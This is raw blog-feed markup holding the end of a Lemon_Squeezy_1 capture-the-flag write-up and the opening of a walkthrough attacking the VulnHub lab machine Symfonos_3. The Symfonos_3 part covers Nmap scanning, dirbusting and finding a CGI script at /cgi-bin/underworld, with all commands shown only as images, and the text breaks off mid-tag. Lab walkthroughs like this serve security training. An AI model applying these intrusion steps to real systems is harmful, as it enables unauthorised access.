shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjhw5qWvX9LU-gSJTI8G-8FrvOGOUqSSFCvyCMFOLddPl_JWXJCI9jgh3Nap_htzJfcyZcP0zA3LODCeECHEvUYv35PL6FNjxFJe-ItUaM0MmUc6yBJUXdgtOYyp3we5CjJLvORHZlijOV2a1BnErIO3_h-AIXDgRDaIvT8SybAzXUsVsfjHGq_7-pNSQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;149&quot; data-original-width=&quot;705&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjhw5qWvX9LU-gSJTI8G-8FrvOGOUqSSFCvyCMFOLddPl_JWXJCI9jgh3Nap_htzJfcyZcP0zA3LODCeECHEvUYv35PL6FNjxFJe-ItUaM0MmUc6yBJUXdgtOYyp3we5CjJLvORHZlijOV2a1BnErIO3_h-AIXDgRDaIvT8SybAzXUsVsfjHGq_7-pNSQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;5 - CAPTURING THE FLAG&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhtdVMpFTP5FLv4a1tT9u6uDkFW0BG9wkC2oeQKWLGugYpGPU_jc9exp0h9kCymTxWfNrkB08EKTOeHKICpUUdawzIuBCg9H9dRW5J5dgcoiKYn2Z0TIAEUd-FpXH9JI_6n9_cDek__swcA81JWJAPje8nXjkHZuLtCr5f8cZgQiS-qtcbe1fBEGJeAqw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;439&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhtdVMpFTP5FLv4a1tT9u6uDkFW0BG9wkC2oeQKWLGugYpGPU_jc9exp0h9kCymTxWfNrkB08EKTOeHKICpUUdawzIuBCg9H9dRW5J5dgcoiKYn2Z0TIAEUd-FpXH9JI_6n9_cDek__swcA81JWJAPje8nXjkHZuLtCr5f8cZgQiS-qtcbe1fBEGJeAqw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4020452017125218289'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4020452017125218289'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/lemonsqueezy1.html' title='Lemon_Squeezy_1'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEh7Cu8fQ_OuHmwf2QuZAeZbC5aOJQznTlLQBFTCX6BOBJLRZ53-BRXVbp0sPQlvGV-86kSXQ0l2DTH7E-NRGUD0mtvbPv3Hd_y-I-fT5dmGd33vIzeTmJUvNKRFOB069z_OTdPYJP7yp2NJhnFH18ifk5Fyr4jgwaCvyyc_q66J3rABAWANUm3LteckLg=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-6149029442648619938</id><published>2022-02-11T13:35:00.005-06:00</published><updated>2022-02-19T13:39:44.109-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Symfonos_3</title><content type='html'>&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&amp;nbsp;SYMFONOS_3&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg7URSg-0LMkVPPU9ub-zp3WWXueRzqJrvcPFDL80zGF3KkGsS0oO9H-HUNdAFQVtPqWXLhEDZhdFJr2BlgKnJHrkcLgmRQwqT9U3VCH8if6W3VTO4ks65q3qz98eQIVcbHgJQBCdpsO6ZuzSgvc8o6boGUk75V4451Cd-T_VQjsEldPcK_gGCYDLMgFQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;249&quot; data-original-width=&quot;637&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg7URSg-0LMkVPPU9ub-zp3WWXueRzqJrvcPFDL80zGF3KkGsS0oO9H-HUNdAFQVtPqWXLhEDZhdFJr2BlgKnJHrkcLgmRQwqT9U3VCH8if6W3VTO4ks65q3qz98eQIVcbHgJQBCdpsO6ZuzSgvc8o6boGUk75V4451Cd-T_VQjsEldPcK_gGCYDLMgFQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Symfonos_3&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;&lt;b&gt;Symfonos_3&amp;nbsp;&lt;/b&gt;can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/symfonos-31,332/&quot;&gt;https://www.vulnhub.com/entry/symfonos-31,332/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi7mHGggW8laax_veZzkK_pGJrUlCvTv4FQ0wG3jWqli7VpwiNWZyT6aFQ9Cujs3lnu5K9N6gzhwhj641oay0EYXndkCmPA6P2i55HQAlR80DHlGmWcO6950Sl52tjx1hpLUkeyH0UTHFTVt2geGqCvJYnH8uaI7OX6nTGLy2VL206YklH9a_s8G3jsoA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;193&quot; data-original-width=&quot;282&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi7mHGggW8laax_veZzkK_pGJrUlCvTv4FQ0wG3jWqli7VpwiNWZyT6aFQ9Cujs3lnu5K9N6gzhwhj641oay0EYXndkCmPA6P2i55HQAlR80DHlGmWcO6950Sl52tjx1hpLUkeyH0UTHFTVt2geGqCvJYnH8uaI7OX6nTGLy2VL206YklH9a_s8G3jsoA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhe2CHTFgRd_LkKhXBfrwtsxg63DPda4WucgXoWtQXwivr0bL31o3CfWJF-zs_qF5r-C44ZtAsFezvUS0uQZHFiUwvT2Oygs8wV44EotEYWXq3QWuoDhlVJmUdBz53-k1oaUzgJT4_ERc1si0CSab26L9-OzJDnvHRf1EXxxYBtdEXRyl-n2mgU-iqhpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;208&quot; data-original-width=&quot;440&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhe2CHTFgRd_LkKhXBfrwtsxg63DPda4WucgXoWtQXwivr0bL31o3CfWJF-zs_qF5r-C44ZtAsFezvUS0uQZHFiUwvT2Oygs8wV44EotEYWXq3QWuoDhlVJmUdBz53-k1oaUzgJT4_ERc1si0CSab26L9-OzJDnvHRf1EXxxYBtdEXRyl-n2mgU-iqhpg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjNkhxDhiHRqKoxMXhrNXW5EFQ47KEZ0aRWyykpIvlY0lJe4MTfGg7g4YqJAZSF_R9qmLcu6X-PqaG-b0WDWA7jTBp8jQ0JhbFKtSZB-JafiEnnRs8ftfmj1lzMmXhNGqfYqp4ry604ir3wpg5BLcLfs5e0Jl6wM5zz5JBKGcMFfUOYrpwlqVEiIJfsgw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;384&quot; data-original-width=&quot;533&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjNkhxDhiHRqKoxMXhrNXW5EFQ47KEZ0aRWyykpIvlY0lJe4MTfGg7g4YqJAZSF_R9qmLcu6X-PqaG-b0WDWA7jTBp8jQ0JhbFKtSZB-JafiEnnRs8ftfmj1lzMmXhNGqfYqp4ry604ir3wpg5BLcLfs5e0Jl6wM5zz5JBKGcMFfUOYrpwlqVEiIJfsgw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- View-sourcing there is a note about &quot;underworld&quot;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjusd30nCs1wpKDAJ6lgfVKi118xNa1__KoQxuJFg6AhR-bO3qrqNcM_Cl_QoyWkYpbkInrw-jdmwQrnuhI4fZWk1Qeu5rlMMi3EKFGp_Lo51E0izNoNEbvgEBhg5iVvBYJckR7YcivBf27qez6gRmqiIny4HefaLPzQ9UW0IgFEEb8MU3hcsGg34lufA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;502&quot; data-original-width=&quot;430&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjusd30nCs1wpKDAJ6lgfVKi118xNa1__KoQxuJFg6AhR-bO3qrqNcM_Cl_QoyWkYpbkInrw-jdmwQrnuhI4fZWk1Qeu5rlMMi3EKFGp_Lo51E0izNoNEbvgEBhg5iVvBYJckR7YcivBf27qez6gRmqiIny4HefaLPzQ9UW0IgFEEb8MU3hcsGg34lufA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting the web server we find &lt;b&gt;/cgi-bin/underworld&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEivlMNKRayB-q8uvGwgc8VeAXU6yY28mBAfMHpAe-Zc6F5pXbWaNAM95g9fI4_ALbAVdmHJjfhEugFZ7A4hJvVJoP02LxF6ZDCw0WDEiB7XG4VFRqALd5zQGrpndmaIMxoN_mJ7uz4hzhXjFts4h_7hsY_uLdOJAfM0z1t6ASCvxsT4a-AtfqDINeNZ-w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;24&quot; data-original-width=&quot;284&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEivlMNKRayB-q8uvGwgc8VeAXU6yY28mBAfMHpAe-Zc6F5pXbWaNAM95g9fI4_ALbAVdmHJjfhEugFZ7A4hJvVJoP02LxF6ZDCw0WDEiB7XG4VFRqALd5zQGrpndmaIMxoN_mJ7uz4hzhXjFts4h_7hsY_uLdOJAfM0z1t6ASCvxsT4a-AtfqDINeNZ-w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi4NsPTrTEx-6Sp9agfklowB-YIr0vzvlhzj0GDdQ3Oy1ChVnGAet5xBcORIuzWk3cKeSYKgAy3ZSB_bDix8s8Om-7N2_-q-nrGzSLlzllzYr1uxNyjE3PXVyZLZbJSjPu05aNumHeXb_W-MjbrFk8VhBdzBEORJpPVdIO-wVGUeyppZ0gyX1imHkutKw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;541&quot; data-original-width=&quot;760&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi4NsPTrTEx-6Sp9agfklowB-YIr0vzvlhzj0GDdQ3Oy1ChVnGAet5xBcORIuzWk3cKeSYKgAy3ZSB_bDix8s8Om-7N2_-q-nrGzSLlzllzYr1uxNyjE3PXVyZLZbJSjPu05aNumHeXb_W-MjbrFk8VhBdzBEORJpPVdIO-wVGUeyppZ0gyX1imHkutKw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj4N99tw3Pq0iIKZPVZOsnI16Cb1rWA_JgcSk3r6CCfUIv9MgFhLu4my3htyVsarxIE_DUcRHm-ZRPenUsAePFankuA17ym09YV76jPBFVT-Lv0ssVB7ZsIBghJw_H4eLoKWxFRXGNLdhcNVk34eoNpE66oBj27sqkETJ5NTSPILdlDjLCnG3HM5JqLqw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;363&quot; data-original-width=&quot;764&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj4N99tw3Pq0iIKZPVZOsnI16Cb1rWA_JgcSk3r6CCfUIv9MgFhLu4my3htyVsarxIE_DUcRHm-ZRPenUsAePFankuA17ym09YV76jPBFVT-Lv0ssVB7ZsIBghJw_H4eLoKWxFRXGNLdhcNVk34eoNpE66oBj27sqkETJ5NTSPILdlDjLCnG3HM5JqLqw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Going to&lt;b&gt; /cgi-bin/underworld&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhtfH2W4uDYMpM19JhX7PD1yYXhFTQVcTE4TfHc1vjLUOjn2Amt4FTkm7pLia6ys1TlPZFAWGzgysqO2OC5ghqsPiyTx12VQLKdHgwxAoT24nDhSObwYb1ClJB9eJ5LRrdtZxtYJCpVS_fc1q3kJopCxMYDUMrwO2eFzSSfOsqZlqV3pZkk4kzNdurs7w&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;133&quot; data-original-width=&quot;507&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhtfH2W4uDYMpM19JhX7PD1yYXhFTQVcTE4TfHc1vjLUOjn2Amt4FTkm7pLia6ys1TlPZFAWGzgysqO2OC5ghqsPiyTx12VQLKdHgwxAoT24nDhSObwYb1ClJB9eJ5LRrdtZxtYJCpVS_fc1q3kJopCxMYDUMrwO2eFzSSfOsqZlqV3pZkk4kzNdurs7w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Output is similar to command &lt;b&gt;uptime&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 